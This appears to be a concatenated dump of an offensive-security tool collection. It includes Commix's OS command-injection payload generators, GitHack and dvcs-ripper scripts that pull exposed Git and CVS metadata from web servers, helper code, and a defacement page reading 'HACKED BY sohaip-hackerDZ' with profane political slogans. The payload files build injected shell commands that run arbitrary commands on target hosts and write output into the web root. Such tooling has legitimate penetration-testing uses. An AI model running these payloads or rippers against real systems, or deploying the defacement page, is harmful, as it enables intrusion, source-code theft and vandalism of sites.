+ " -c \"open('" + OUTPUT_TEXTFILE + "','w').write('" + TAG + "')\"" 48 | payload = (separator + 49 | "for /f \"tokens=*\" %i in ('cmd /c " + 50 | python_payload + 51 | "') do @set /p =%i< nul" 52 | ) 53 | else: 54 | payload = (separator + 55 | "$(python -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + TAG + "')\nf.close()\n\")" 56 | ) 57 | 58 | if settings.USER_AGENT_INJECTION == True or \ 59 | settings.REFERER_INJECTION == True or \ 60 | settings.CUSTOM_HEADER_INJECTION == True : 61 | payload = payload.replace("\n", separator) 62 | else: 63 | if not settings.TAMPER_SCRIPTS['base64encode'] and \ 64 | not settings.TAMPER_SCRIPTS['hexencode']: 65 | if settings.TARGET_OS != "win": 66 | payload = payload.replace("\n","%0d") 67 | 68 | return payload 69 | 70 | """ 71 | Execute shell commands on vulnerable host. 72 | """ 73 | def cmd_execution(separator, cmd, OUTPUT_TEXTFILE): 74 | 75 | if settings.TFB_DECIMAL == True: 76 | payload = (separator +cmd) 77 | 78 | elif settings.TARGET_OS == "win": 79 | payload = (separator + 80 | "for /f \"tokens=*\" %i in ('cmd /c \"" + 81 | "powershell.exe -InputFormat none write-host (cmd /c \"" + 82 | cmd + 83 | "\")\"') do @set /p =%i " + ">" + OUTPUT_TEXTFILE + "< nul" 84 | ) 85 | else: 86 | # if settings.USER_AGENT_INJECTION == True or \ 87 | # settings.REFERER_INJECTION == True or \ 88 | # settings.CUSTOM_HEADER_INJECTION == True: 89 | # if not settings.DEL in cmd: 90 | # cmd = "echo $(" + cmd + ")" 91 | payload = (separator + 92 | cmd + ">" + settings.WEB_ROOT + OUTPUT_TEXTFILE 93 | ) 94 | 95 | return payload 96 | 97 | """ 98 | __Warning__: The alternative shells are still experimental. 99 | """ 100 | def cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE): 101 | if settings.TARGET_OS == "win": 102 | if settings.REVERSE_TCP: 103 | payload = (separator +cmd + " " 104 | ) 105 | else: 106 | python_payload = settings.WIN_PYTHON_DIR + " -c \"import os; os.system('" + cmd + ">" + OUTPUT_TEXTFILE + "')\"" 107 | payload = (separator + 108 | "for /f \"tokens=*\" %i in ('cmd /c " + 109 | python_payload + 110 | "') do @set /p =%i< nul" 111 | ) 112 | else: 113 | payload = (separator + 114 | "$(python -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('$(echo $(" + cmd + "))')\nf.close()\n\")" 115 | ) 116 | 117 | # New line fixation 118 | if settings.USER_AGENT_INJECTION == True or \ 119 | settings.REFERER_INJECTION == True or \ 120 | settings.CUSTOM_HEADER_INJECTION == True: 121 | payload = payload.replace("\n", separator) 122 | else: 123 | if not settings.TAMPER_SCRIPTS['base64encode'] and \ 124 | not settings.TAMPER_SCRIPTS['hexencode']: 125 | if settings.TARGET_OS != "win": 126 | payload = payload.replace("\n","%0d") 127 | 128 | return payload 129 | 130 | #eof -------------------------------------------------------------------------------- /commix/src/core/injections/results_based/techniques/classic/cb_payloads.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | from src.utils import settings 17 | 18 | """ 19 | The classic injection technique on Classic OS Command Injection. 20 | The available "classic" payloads. 21 | """ 22 | 23 | """ 24 | Classic decision payload (check if host is vulnerable). 25 | """ 26 | def decision(separator, TAG, randv1, randv2): 27 | if settings.TARGET_OS == "win": 28 | if settings.SKIP_CALC: 29 | payload = (separator + 30 | "echo " + TAG + TAG + TAG + "< nul" 31 | ) 32 | else: 33 | payload = (separator + 34 | "for /f \"tokens=*\" %i in ('cmd /c \"" + 35 | "set /a (" + str(randv1) + "%2B" + str(randv2) + ")" + 36 | "\"') do @set /p = " + TAG + "%i" + TAG + TAG + "< nul" 37 | ) 38 | else: 39 | if not settings.WAF_ENABLED: 40 | math_calc = "$((" + str(randv1) + "%2B" + str(randv2) + "))" 41 | else: 42 | math_calc = "$(expr " + str(randv1) + " %2B " + str(randv2) + ")" 43 | if settings.SKIP_CALC: 44 | payload = (separator + 45 | "echo " + TAG + 46 | "$(echo " + TAG + ")" + TAG + "" 47 | ) 48 | else: 49 | payload = (separator + 50 | "echo " + TAG + 51 | math_calc + 52 | "$(echo " + TAG + ")" + TAG + "" 53 | ) 54 | return payload 55 | 56 | """ 57 | __Warning__: The alternative shells are still experimental. 58 | """ 59 | def decision_alter_shell(separator, TAG, randv1, randv2): 60 | if settings.TARGET_OS == "win": 61 | if settings.SKIP_CALC: 62 | python_payload = settings.WIN_PYTHON_DIR + " -c \"print '" + TAG + "'%2B'" + TAG + "'%2B'" + TAG + "'\"" 63 | else: 64 | python_payload = settings.WIN_PYTHON_DIR + " -c \"print '" + TAG + "'%2Bstr(int(" + str(int(randv1)) + "%2B" + str(int(randv2)) + "))" + "%2B'" + TAG + "'%2B'" + TAG + "'\"" 65 | 66 | payload = (separator + 67 | "for /f \"tokens=*\" %i in ('cmd /c " + 68 | python_payload + 69 | "') do @set /p =%i< nul" 70 | ) 71 | else: 72 | if settings.SKIP_CALC: 73 | payload = (separator + 74 | "python -c \"print'" + TAG + 75 | TAG + 76 | TAG + "'\"" 77 | ) 78 | else: 79 | payload = (separator + 80 | "python -c \"print'" + TAG + 81 | "'%2Bstr(int(" + str(int(randv1)) + "%2B" + str(int(randv2)) + "))" + "%2B'" + 82 | TAG + "'%2B'" + 83 | TAG + "'\"" 84 | ) 85 | return payload 86 | 87 | """ 88 | Execute shell commands on vulnerable host. 89 | """ 90 | def cmd_execution(separator, TAG, cmd): 91 | if settings.TARGET_OS == "win": 92 | if settings.REVERSE_TCP: 93 | payload = (separator + cmd + " " 94 | ) 95 | else: 96 | payload = (separator + 97 | "for /f \"tokens=*\" %i in ('cmd /c \"" + 98 | cmd + 99 | "\"') do @set /p = " + TAG + TAG + "%i" + TAG + TAG + "< nul" 100 | ) 101 | else: 102 | if not settings.WAF_ENABLED: 103 | cmd_exec = "$(echo $(" + cmd + "))" 104 | else: 105 | cmd_exec = "$(" + cmd + ")" 106 | payload = (separator + 107 | "echo " + TAG + 108 | "$(echo " + TAG + ")" + 109 | cmd_exec + 110 | "$(echo " + TAG + ")" + TAG + "" 111 | ) 112 | return payload 113 | 114 | """ 115 | __Warning__: The alternative shells are still experimental. 116 | """ 117 | def cmd_execution_alter_shell(separator, TAG, cmd): 118 | if settings.TARGET_OS == "win": 119 | if settings.REVERSE_TCP: 120 | payload = (separator +cmd + " " 121 | ) 122 | else: 123 | payload = (separator + 124 | "for /f \"tokens=*\" %i in ('" + 125 | settings.WIN_PYTHON_DIR + " -c \"import os; os.system('powershell.exe -InputFormat none write-host " + TAG + TAG + " $(" + cmd + ") "+ TAG + TAG + "')\"" + 126 | "') do @set /p =%i< nul" 127 | ) 128 | 129 | else: 130 | payload = (separator + 131 | "python -c \"print'" + TAG + "'%2B'" + TAG + "'%2B'$(echo $(" +cmd+ "))'%2B'" + TAG + "'%2B'" + TAG + "'\"" 132 | ) 133 | return payload 134 | 135 | #eof 136 | -------------------------------------------------------------------------------- /GitHack/lib/parser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # https://github.com/git/git/blob/master/Documentation/technical/index-format.txt 4 | # 5 | 6 | import binascii 7 | import collections 8 | import mmap 9 | import struct 10 | import sys 11 | 12 | 13 | def check(boolean, message): 14 | if not boolean: 15 | import sys 16 | print "error: " + message 17 | sys.exit(1) 18 | 19 | 20 | def parse(filename, pretty=True): 21 | with open(filename, "rb") as o: 22 | f = mmap.mmap(o.fileno(), 0, access=mmap.ACCESS_READ) 23 | 24 | def read(format): 25 | # "All binary numbers are in network byte order." 26 | # Hence "!" = network order, big endian 27 | format = "! " + format 28 | bytes = f.read(struct.calcsize(format)) 29 | return struct.unpack(format, bytes)[0] 30 | 31 | index = collections.OrderedDict() 32 | 33 | # 4-byte signature, b"DIRC" 34 | index["signature"] = f.read(4).decode("ascii") 35 | check(index["signature"] == "DIRC", "Not a Git index file") 36 | 37 | # 4-byte version number 38 | index["version"] = read("I") 39 | check(index["version"] in {2, 3}, 40 | "Unsupported version: %s" % index["version"]) 41 | 42 | # 32-bit number of index entries, i.e. 4-byte 43 | index["entries"] = read("I") 44 | 45 | yield index 46 | 47 | for n in range(index["entries"]): 48 | entry = collections.OrderedDict() 49 | 50 | entry["entry"] = n + 1 51 | 52 | entry["ctime_seconds"] = read("I") 53 | entry["ctime_nanoseconds"] = read("I") 54 | if pretty: 55 | entry["ctime"] = entry["ctime_seconds"] 56 | entry["ctime"] += entry["ctime_nanoseconds"] / 1000000000 57 | del entry["ctime_seconds"] 58 | del entry["ctime_nanoseconds"] 59 | 60 | entry["mtime_seconds"] = read("I") 61 | entry["mtime_nanoseconds"] = read("I") 62 | if pretty: 63 | entry["mtime"] = entry["mtime_seconds"] 64 | entry["mtime"] += entry["mtime_nanoseconds"] / 1000000000 65 | del entry["mtime_seconds"] 66 | del entry["mtime_nanoseconds"] 67 | 68 | entry["dev"] = read("I") 69 | entry["ino"] = read("I") 70 | 71 | # 4-bit object type, 3-bit unused, 9-bit unix permission 72 | entry["mode"] = read("I") 73 | if pretty: 74 | entry["mode"] = "%06o" % entry["mode"] 75 | 76 | entry["uid"] = read("I") 77 | entry["gid"] = read("I") 78 | entry["size"] = read("I") 79 | 80 | entry["sha1"] = binascii.hexlify(f.read(20)).decode("ascii") 81 | entry["flags"] = read("H") 82 | 83 | # 1-bit assume-valid 84 | entry["assume-valid"] = bool(entry["flags"] & (0b10000000 << 8)) 85 | # 1-bit extended, must be 0 in version 2 86 | entry["extended"] = bool(entry["flags"] & (0b01000000 << 8)) 87 | # 2-bit stage (?) 88 | stage_one = bool(entry["flags"] & (0b00100000 << 8)) 89 | stage_two = bool(entry["flags"] & (0b00010000 << 8)) 90 | entry["stage"] = stage_one, stage_two 91 | # 12-bit name length, if the length is less than 0xFFF (else, 0xFFF) 92 | namelen = entry["flags"] & 0xFFF 93 | 94 | # 62 bytes so far 95 | entrylen = 62 96 | 97 | if entry["extended"] and (index["version"] == 3): 98 | entry["extra-flags"] = read("H") 99 | # 1-bit reserved 100 | entry["reserved"] = bool(entry["extra-flags"] & (0b10000000 << 8)) 101 | # 1-bit skip-worktree 102 | entry["skip-worktree"] = bool(entry["extra-flags"] & (0b01000000 << 8)) 103 | # 1-bit intent-to-add 104 | entry["intent-to-add"] = bool(entry["extra-flags"] & (0b00100000 << 8)) 105 | # 13-bits unused 106 | # used = entry["extra-flags"] & (0b11100000 << 8) 107 | # check(not used, "Expected unused bits in extra-flags") 108 | entrylen += 2 109 | 110 | if namelen < 0xFFF: 111 | entry["name"] = f.read(namelen).decode("utf-8", "replace") 112 | entrylen += namelen 113 | else: 114 | # Do it the hard way 115 | name = [] 116 | while True: 117 | byte = f.read(1) 118 | if byte == "\x00": 119 | break 120 | name.append(byte) 121 | entry["name"] = b"".join(name).decode("utf-8", "replace") 122 | entrylen += 1 123 | 124 | padlen = (8 - (entrylen % 8)) or 8 125 | nuls = f.read(padlen) 126 | check(set(nuls) == set(['\x00']), "padding contained non-NUL") 127 | 128 | yield entry 129 | 130 | f.close() 131 | 132 | 133 | 134 | 135 | 136 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/index: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | HACKED BY sohaip-hackerDZ 8 | 9 | 10 | 16 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 37 | 87 | 88 |
27 |
28 | 35 |
36 | 		38 | 39 | 40 | 75 | 84 | 85 |
41 | 
42 |   HACKED BY sohaip-hackerDZ
43 | 
44 | ----------------------------------
45 | Fuck   Russia and United States and France and United Kingdom
46 | 
47 | لا اله الا الله محمد رسول الله IAM Muslim
48 | 
49 | 
50 | 
51 | 
52 | 
53 | -----------------------------------
54 | hackerz Algeria from here !!!
55 | free Palestine !!
56 | 
57 | 
58 | 
59 | 
60 | 
61 | 
62 | Anonymous -We are legion, We do not forgive, We do not forget,Expect us!
63 | We are
64 | sohaip-hackerDZ :: Daher.Ps :: groups spyhackerz :: groups 3F.Team.iq 
65 | 
66 | 
67 | ----------------------------------
68 | 
69 | [+]sohaip-hackerDZ[+] | [+]sohaip-hackerDZ[+]  | [+]sohaip-hackerDZ[+]
70 | 	 
72 | 
73 |
74 | 		76 | 77 | 78 | 79 | 80 | 81 | 82 |
83 |
86 |
89 |
90 |
91 | 92 | -------------------------------------------------------------------------------- /commix/src/core/requests/redirection.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import sys 17 | import urllib2 18 | from src.utils import menu 19 | from src.utils import settings 20 | from src.thirdparty.colorama import Fore, Back, Style, init 21 | 22 | def do_check(url): 23 | """ 24 | This functinality is based on Filippo's Valsorda script [1] 25 | which uses HEAD requests (with fallback in case of 405) 26 | to follow the redirect path up to the real URL. 27 | --- 28 | [1] https://gist.github.com/FiloSottile/2077115 29 | """ 30 | class HeadRequest(urllib2.Request): 31 | def get_method(self): 32 | return "HEAD" 33 | 34 | class HEADRedirectHandler(urllib2.HTTPRedirectHandler): 35 | """ 36 | Subclass the HTTPRedirectHandler to make it use our 37 | HeadRequest also on the redirected URL 38 | """ 39 | def redirect_request(self, req, fp, code, msg, headers, redirected_url): 40 | if code in (301, 302, 303, 307): 41 | redirected_url = redirected_url.replace(' ', '%20') 42 | newheaders = dict((k,v) for k,v in req.headers.items() 43 | if k.lower() not in ("content-length", "content-type")) 44 | warn_msg = "Got a " + str(code) + " redirection (" + redirected_url + ")." 45 | print settings.print_warning_msg(warn_msg) 46 | return HeadRequest(redirected_url, 47 | headers = newheaders, 48 | origin_req_host = req.get_origin_req_host(), 49 | unverifiable = True 50 | ) 51 | else: 52 | err_msg = str(urllib2.HTTPError(req.get_full_url(), code, msg, headers, fp)).replace(": "," (") 53 | print settings.print_critical_msg(err_msg + ").") 54 | raise SystemExit() 55 | 56 | class HTTPMethodFallback(urllib2.BaseHandler): 57 | """ 58 | Fallback to GET if HEAD is not allowed (405 HTTP error) 59 | """ 60 | def http_error_405(self, req, fp, code, msg, headers): 61 | fp.read() 62 | fp.close() 63 | 64 | newheaders = dict((k,v) for k,v in req.headers.items() if k.lower() not in ("content-length", "content-type")) 65 | return self.parent.open(urllib2.Request(req.get_full_url(), 66 | headers = newheaders, 67 | origin_req_host = req.get_origin_req_host(), 68 | unverifiable = True) 69 | ) 70 | 71 | # Build our opener 72 | opener = urllib2.OpenerDirector() 73 | # Check if defined any HTTP Host header. 74 | if menu.options.host: 75 | opener.addheaders.append(('Host', menu.options.host)) 76 | # Check if defined any HTTP User-Agent header. 77 | if menu.options.agent: 78 | opener.addheaders.append(('User-Agent', menu.options.agent)) 79 | # Check if defined any HTTP Referer header. 80 | if menu.options.referer and settings.REFERER_INJECTION == False: 81 | opener.addheaders.append(('Referer', menu.options.referer)) 82 | # Check if defined any HTTP Cookie header. 83 | if menu.options.cookie and settings.COOKIE_INJECTION == False: 84 | opener.addheaders.append(('Cookie', menu.options.cookie)) 85 | 86 | for handler in [urllib2.HTTPHandler, 87 | HTTPMethodFallback, 88 | HEADRedirectHandler, 89 | urllib2.HTTPErrorProcessor, 90 | urllib2.HTTPSHandler]: 91 | opener.add_handler(handler()) 92 | try: 93 | response = opener.open(HeadRequest(url)) 94 | redirected_url = response.geturl() 95 | 96 | if redirected_url != url: 97 | while True: 98 | if not menu.options.batch: 99 | question_msg = "Do you want to follow the identified redirection? [Y/n] > " 100 | sys.stdout.write(settings.print_question_msg(question_msg)) 101 | redirection_option = sys.stdin.readline().replace("\n","").lower() 102 | else: 103 | redirection_option = "" 104 | if len(redirection_option) == 0 or redirection_option in settings.CHOICE_YES: 105 | if menu.options.batch: 106 | info_msg = "Following redirection to '" + redirected_url + "'. " 107 | print settings.print_info_msg(info_msg) 108 | return redirected_url 109 | elif redirection_option in settings.CHOICE_NO: 110 | return url 111 | elif redirection_option in settings.CHOICE_QUIT: 112 | sys.exit(0) 113 | else: 114 | err_msg = "'" + redirection_option + "' is not a valid answer." 115 | print settings.print_error_msg(err_msg) 116 | pass 117 | else: 118 | return url 119 | 120 | except urllib2.HTTPError, err: 121 | err_msg = str(err).replace(": "," (") 122 | print settings.print_critical_msg(err_msg + ").") 123 | raise SystemExit() 124 | -------------------------------------------------------------------------------- /dvcs-ripper/rip-cvs.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use strict; 4 | 5 | use IO::Socket::SSL; 6 | use LWP; 7 | use LWP::UserAgent; 8 | use HTTP::Request; 9 | use Getopt::Long; 10 | 11 | my $configfile="$ENV{HOME}/.rip-cvs"; 12 | my %config; 13 | $config{'branch'} = "HEAD"; 14 | $config{'scmdir'} = "CVS"; 15 | $config{'agent'} = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:10.0.2) Gecko/20100101 Firefox/10.0.2'; 16 | $config{'verbose'}=0; 17 | $config{'checkout'}=1; 18 | $config{'outdir'}='./'; 19 | $config{'rlevel'}=9; 20 | 21 | if (-e $configfile) { 22 | open(CONFIG,"<$configfile") or next; 23 | while () { 24 | chomp; # no newline 25 | s/#.*//; # no comments 26 | s/^\s+//; # no leading white 27 | s/\s+$//; # no trailing white 28 | next unless length; # anything left? 29 | my ($var, $value) = split(/\s*=\s*/, $_, 2); 30 | $config{$var} = $value; 31 | } 32 | close(CONFIG); 33 | } 34 | 35 | Getopt::Long::Configure ("bundling"); 36 | 37 | my $result = GetOptions ( 38 | "a|agent=s" => \$config{'agent'}, 39 | "b|branch=s" => \$config{'branch'}, 40 | "u|url=s" => \$config{'url'}, 41 | "c|checkout!" => \$config{'checkout'}, 42 | "s|sslignore!" => \$config{'sslignore'}, 43 | "v|verbose+" => \$config{'verbose'}, 44 | "h|help" => \&help 45 | ); 46 | 47 | my @scmfiles=( 48 | "Repository", 49 | "Root", 50 | "Entries" 51 | ); 52 | 53 | if ($config{'verbose'}>3) { 54 | foreach my $key ( keys %config ) 55 | { 56 | print "[c] $key => $config{$key}\n"; 57 | } 58 | } 59 | 60 | my $ua = LWP::UserAgent->new; 61 | $ua->agent($config{'agent'}); 62 | 63 | if ($config{'sslignore'}) { 64 | $ua->ssl_opts(SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE, verify_hostname => 0); 65 | } 66 | 67 | # normalize URL 68 | if ($config{'url'} =~ /\/\CVS/) { 69 | $config{'scmurl'} = $config{'url'}; 70 | $config{'regurl'} = $config{'url'}; 71 | $config{'regurl'} =~ s/\/CVS//; 72 | } else { 73 | $config{'scmurl'} = $config{'url'}."/CVS"; 74 | $config{'regurl'} = $config{'url'}; 75 | } 76 | 77 | processcvs ('',$config{'outdir'},0); 78 | 79 | sub processcvs { 80 | my ($url,$dir,$level) = @_; 81 | createcvsdirs ($dir); 82 | downloadcvsfiles ($url,$dir); 83 | 84 | return if ($level>$config{'rlevel'}); 85 | 86 | my $cntfile; 87 | 88 | my $ident=" "x$level; 89 | 90 | if (-e "$dir/$config{'scmdir'}/Root" and $level==0) { 91 | $cntfile++; 92 | print "$ident"."[i] CVSROOT="; 93 | displayfile("$dir/$config{'scmdir'}/Root"); 94 | } 95 | 96 | if (-e "$dir/$config{'scmdir'}/Repository" and $level==0) { 97 | $cntfile++; 98 | print "$ident"."[i] cvs checkout "; 99 | displayfile("$dir/$config{'scmdir'}/Repository"); 100 | } 101 | 102 | if (-e "$dir/$config{'scmdir'}/Entries") { 103 | $cntfile++; 104 | my $cont=readfile("$dir/$config{'scmdir'}/Entries"); 105 | # print $cont; 106 | # print sprintf "%s%1s %-25s %-14s %22s\n", "T", "Name", "Revision", "Date"; 107 | foreach ( split /\n/, $cont ) { 108 | if (/\//) { 109 | my @rec = split(/\//); 110 | print sprintf "%s%1s %-38s %-14s %22s\n", $ident, $rec[0], $rec[1], $rec[2], $rec[3]; 111 | if ($rec[0] eq 'D') { 112 | mkdir "$dir/$rec[1]"; 113 | processcvs("$url/$rec[1]","$dir/$rec[1]",$level+1); 114 | } 115 | } 116 | } 117 | } 118 | 119 | if ($level==0) { 120 | if ($cntfile > 0) { 121 | print STDERR "$ident"."[i] CVS identified on $config{'url'} by $cntfile guesses\n"; 122 | } else { 123 | print STDERR "$ident"."[i] CVS not identified, check URL: $config{'url'}\n"; 124 | } 125 | } 126 | 127 | } 128 | 129 | 130 | sub displayfile { 131 | my ($file) = @_; 132 | open (FILE, "<$file") or warn ("cannot open $file: $!"); 133 | while () { 134 | print $_; 135 | } 136 | close (FILE); 137 | } 138 | 139 | sub readfile { 140 | my ($file) = @_; 141 | open (FILE, "<$file") or warn ("cannot open $file: $!"); 142 | my $str; 143 | while () { 144 | $str=$str.$_; 145 | } 146 | close (FILE); 147 | # print ":$str:\n"; 148 | return ($str); 149 | } 150 | 151 | sub createcvsdirs { 152 | my ($dir) = @_; 153 | mkdir $dir."/CVS"; 154 | } 155 | 156 | sub downloadcvsfiles { 157 | my ($url,$dir) = @_; 158 | foreach my $file (@scmfiles) { 159 | my $furl = "$url/$config{'scmdir'}/$file"; 160 | getfile($furl,"$dir/$config{'scmdir'}/$file"); 161 | } 162 | } 163 | 164 | sub getfile { 165 | my ($file,$outfile) = @_; 166 | my $furl = $config{'regurl'}."/".$file; 167 | my $req = HTTP::Request->new(GET => $furl); 168 | # Pass request to the user agent and get a response back 169 | my $res = $ua->request($req); 170 | if ($res->is_success) { 171 | print STDERR "[d] found $file\n" if ($config{'verbose'}>1);; 172 | open (out,">$outfile") or die ("cannot open file '$outfile': $!"); 173 | print out $res->content; 174 | close (out); 175 | } else { 176 | print STDERR "[!] Not found for $furl => $file: ".$res->status_line."\n" 177 | if ($config{'verbose'}>1); 178 | } 179 | return $res; 180 | } 181 | 182 | sub help { 183 | print "DVCS-Ripper: rip-cvs.pl. Copyright (C) Kost. Distributed under GPL.\n\n"; 184 | print "Usage: $0 [options] -u [url] \n"; 185 | print "\n"; 186 | print " -c perform 'checkout' on end (default)\n"; 187 | print " -b Use branch (default: $config{'branch'})\n"; 188 | print " -a Use agent (default: $config{'agent'})\n"; 189 | print " -s ignore SSL certification verification\n"; 190 | print " -v verbose (-vv will be more verbose)\n"; 191 | print "\n"; 192 | 193 | print "Example: $0 -v -u http://www.example.com/CVS/\n"; 194 | print "Example: $0 # with url and options in $configfile\n"; 195 | 196 | exit 0; 197 | } 198 | 199 | -------------------------------------------------------------------------------- /commix/src/thirdparty/colorama/win32.py: -------------------------------------------------------------------------------- 1 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 2 | 3 | # from winbase.h 4 | STDOUT = -11 5 | STDERR = -12 6 | 7 | try: 8 | import ctypes 9 | from ctypes import LibraryLoader 10 | windll = LibraryLoader(ctypes.WinDLL) 11 | from ctypes import wintypes 12 | except (AttributeError, ImportError): 13 | windll = None 14 | SetConsoleTextAttribute = lambda *_: None 15 | else: 16 | from ctypes import byref, Structure, c_char, POINTER 17 | 18 | COORD = wintypes._COORD 19 | 20 | class CONSOLE_SCREEN_BUFFER_INFO(Structure): 21 | """struct in wincon.h.""" 22 | _fields_ = [ 23 | ("dwSize", COORD), 24 | ("dwCursorPosition", COORD), 25 | ("wAttributes", wintypes.WORD), 26 | ("srWindow", wintypes.SMALL_RECT), 27 | ("dwMaximumWindowSize", COORD), 28 | ] 29 | def __str__(self): 30 | return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % ( 31 | self.dwSize.Y, self.dwSize.X 32 | , self.dwCursorPosition.Y, self.dwCursorPosition.X 33 | , self.wAttributes 34 | , self.srWindow.Top, self.srWindow.Left, self.srWindow.Bottom, self.srWindow.Right 35 | , self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X 36 | ) 37 | 38 | _GetStdHandle = windll.kernel32.GetStdHandle 39 | _GetStdHandle.argtypes = [ 40 | wintypes.DWORD, 41 | ] 42 | _GetStdHandle.restype = wintypes.HANDLE 43 | 44 | _GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo 45 | _GetConsoleScreenBufferInfo.argtypes = [ 46 | wintypes.HANDLE, 47 | POINTER(CONSOLE_SCREEN_BUFFER_INFO), 48 | ] 49 | _GetConsoleScreenBufferInfo.restype = wintypes.BOOL 50 | 51 | _SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute 52 | _SetConsoleTextAttribute.argtypes = [ 53 | wintypes.HANDLE, 54 | wintypes.WORD, 55 | ] 56 | _SetConsoleTextAttribute.restype = wintypes.BOOL 57 | 58 | _SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition 59 | _SetConsoleCursorPosition.argtypes = [ 60 | wintypes.HANDLE, 61 | COORD, 62 | ] 63 | _SetConsoleCursorPosition.restype = wintypes.BOOL 64 | 65 | _FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA 66 | _FillConsoleOutputCharacterA.argtypes = [ 67 | wintypes.HANDLE, 68 | c_char, 69 | wintypes.DWORD, 70 | COORD, 71 | POINTER(wintypes.DWORD), 72 | ] 73 | _FillConsoleOutputCharacterA.restype = wintypes.BOOL 74 | 75 | _FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute 76 | _FillConsoleOutputAttribute.argtypes = [ 77 | wintypes.HANDLE, 78 | wintypes.WORD, 79 | wintypes.DWORD, 80 | COORD, 81 | POINTER(wintypes.DWORD), 82 | ] 83 | _FillConsoleOutputAttribute.restype = wintypes.BOOL 84 | 85 | _SetConsoleTitleW = windll.kernel32.SetConsoleTitleA 86 | _SetConsoleTitleW.argtypes = [ 87 | wintypes.LPCSTR 88 | ] 89 | _SetConsoleTitleW.restype = wintypes.BOOL 90 | 91 | handles = { 92 | STDOUT: _GetStdHandle(STDOUT), 93 | STDERR: _GetStdHandle(STDERR), 94 | } 95 | 96 | def GetConsoleScreenBufferInfo(stream_id=STDOUT): 97 | handle = handles[stream_id] 98 | csbi = CONSOLE_SCREEN_BUFFER_INFO() 99 | success = _GetConsoleScreenBufferInfo( 100 | handle, byref(csbi)) 101 | return csbi 102 | 103 | def SetConsoleTextAttribute(stream_id, attrs): 104 | handle = handles[stream_id] 105 | return _SetConsoleTextAttribute(handle, attrs) 106 | 107 | def SetConsoleCursorPosition(stream_id, position, adjust=True): 108 | position = COORD(*position) 109 | # If the position is out of range, do nothing. 110 | if position.Y <= 0 or position.X <= 0: 111 | return 112 | # Adjust for Windows' SetConsoleCursorPosition: 113 | # 1. being 0-based, while ANSI is 1-based. 114 | # 2. expecting (x,y), while ANSI uses (y,x). 115 | adjusted_position = COORD(position.Y - 1, position.X - 1) 116 | if adjust: 117 | # Adjust for viewport's scroll position 118 | sr = GetConsoleScreenBufferInfo(STDOUT).srWindow 119 | adjusted_position.Y += sr.Top 120 | adjusted_position.X += sr.Left 121 | # Resume normal processing 122 | handle = handles[stream_id] 123 | return _SetConsoleCursorPosition(handle, adjusted_position) 124 | 125 | def FillConsoleOutputCharacter(stream_id, char, length, start): 126 | handle = handles[stream_id] 127 | char = c_char(char.encode()) 128 | length = wintypes.DWORD(length) 129 | num_written = wintypes.DWORD(0) 130 | # Note that this is hard-coded for ANSI (vs wide) bytes. 131 | success = _FillConsoleOutputCharacterA( 132 | handle, char, length, start, byref(num_written)) 133 | return num_written.value 134 | 135 | def FillConsoleOutputAttribute(stream_id, attr, length, start): 136 | ''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )''' 137 | handle = handles[stream_id] 138 | attribute = wintypes.WORD(attr) 139 | length = wintypes.DWORD(length) 140 | num_written = wintypes.DWORD(0) 141 | # Note that this is hard-coded for ANSI (vs wide) bytes. 142 | return _FillConsoleOutputAttribute( 143 | handle, attribute, length, start, byref(num_written)) 144 | 145 | def SetConsoleTitle(title): 146 | return _SetConsoleTitleW(title) 147 | -------------------------------------------------------------------------------- /dvcs-ripper/README.md: -------------------------------------------------------------------------------- 1 | dvcs-ripper 2 | =========== 3 | 4 | Rip web accessible (distributed) version control systems: SVN, GIT, Mercurial/hg, bzr, ... 5 | 6 | It can rip repositories even when directory browsing is turned off. 7 | 8 | Make sure to position yourself in empty directory where you want repositories to be downloaded/cloned. 9 | 10 | ## Requirements 11 | 12 | - Perl 13 | - Perl modules: 14 | - required: LWP, IO::Socket::SSL 15 | - for newer SVN: DBD::SQlite and DBI 16 | - for faster GIT: Parallel::ForkManager, Redis and Algorithm::Combinatorics 17 | - (D)VCS client of what you want to rip (cvs, svn, git, hg, bzr, ...) 18 | 19 | ### Requirements on Debian/Ubuntu 20 | 21 | You can easily install perl requirements: 22 | 23 | `sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl` 24 | 25 | Optional requirements (faster git rip): 26 | `sudo apt-get install libparallel-forkmanager-perl libredis-perl libalgorithm-combinatorics-perl` 27 | 28 | And if you need all clients supported: 29 | 30 | 